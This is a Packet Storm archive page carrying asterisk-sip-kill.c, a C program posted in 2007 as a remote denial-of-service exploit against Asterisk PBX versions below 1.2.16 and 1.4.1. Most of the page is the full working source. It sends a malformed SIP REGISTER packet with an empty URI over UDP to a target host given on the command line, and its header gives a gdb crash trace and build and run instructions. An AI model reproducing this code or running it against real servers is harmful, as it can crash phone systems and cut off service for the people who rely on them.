exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

asterisk-sip-kill.c

asterisk-sip-kill.c
Posted Mar 8, 2007
Authored by anonymous

Remote denial of service exploit for Asterisk PBX that makes use of a bug in the SIP channel driver. Versions below 1.2.16 and below 1.4.1 are affected.

tags | exploit, remote, denial of service
SHA-256 | 5a35585cb02179c081c481b527bb9d32dd489f17cdc09a9fbdc837c8bfa91a2c

asterisk-sip-kill.c

Change Mirror Download
/*
this will cause asterisk to segfault,
the bug that this exploits has been patched in release 1.2.16 & 1.4.1

CLI>

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1082719152 (LWP 2510)]
register_verify (p=0x81cf600, sin=0x4088e750, req=0x4088e760, uri=0x0)
at chan_sip.c:8257
8257 while (*t && *t > ' ' && *t != ';')
(gdb)


build:
gcc -o asterisk-sip-killer asterisk-sip-killer.c

run:
./asterisk-sip-killer -h <targethost>

*/
#include <stdio.h>
#include <string.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <netdb.h>
#include <netinet/tcp.h>

#define SIP_UDP_PORT 5060

struct udp_session {
int sd;
struct sockaddr_in saddr;
};

int make_udp(struct udp_session *p, char *remotehost, int port)
{
int sd;
int ret;
struct sockaddr_in saddr;
struct hostent *he;

sd = socket(AF_INET,SOCK_DGRAM,0);

if (sd == -1) {
printf("error making socket\n");
return -1;
}

he = gethostbyname(remotehost);

saddr.sin_family = AF_INET;
saddr.sin_port = htons(port);
saddr.sin_addr.s_addr = inet_addr(remotehost);
memset(&(saddr.sin_zero), '\0', 8);
p->sd = sd;
memcpy(&p->saddr,&saddr,sizeof(struct sockaddr_in));

printf("udp socket ready\n");

return 0;
}

void kill_asterisk(struct udp_session *sess)
{
int ret;
char *p =
"REGISTER \r\n"
"Via: SIP/2.0/UDP 192.168.204.130:5060;branch=z9hG4bK1d97e14f\r\n"
"Max-Forwards: 70\r\n"
"From: <sip:666@192.168.204.130>;tag=as253946cf\r\n"
"To: <sip:100@192.168.204.130>\r\n"
"Call-ID: 7e64a49e5cf018231228938050e43d3b@127.0.0.1\r\n"
"CSeq: 104 REGISTER\r\n"
"User-Agent: Asterisk PBX\r\n"
"Expires: 120\r\n"
"Contact: <sip:666@192.168.204.130>\r\n"
"Event: registration\r\n"
"Content-Length: 0\r\n";

ret = sendto(sess->sd, p, strlen(p), 0,
(struct sockaddr *)&sess->saddr,
sizeof(struct sockaddr));

if (ret) {
printf("You may have well shutdown a asterisk server\n");
} else {
printf("there was a issue sending the request\n");
return;
}
return;
}
int main(int argc, char **argv)
{
int i = 0;
char *r_host = NULL;
struct udp_session *connection_out;


for (i=0;i<argc;i++) {
if (!(strcmp(argv[i],"-h"))) {
printf("it looks like you want a host entry\n");
r_host = argv[i+1];
printf("r_host: %s\n", r_host);
}
}

if (!r_host) {
printf("umm you forgot the -h <host> option!\n");
return 0;
}

if (!(connection_out = (struct udp_session *)malloc(sizeof(struct udp_session)))) {
printf("malloc failed your computer sucks\n");
return 0;
}
make_udp(connection_out, r_host, SIP_UDP_PORT);
kill_asterisk(connection_out);
free(connection_out);
return 0;
}
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close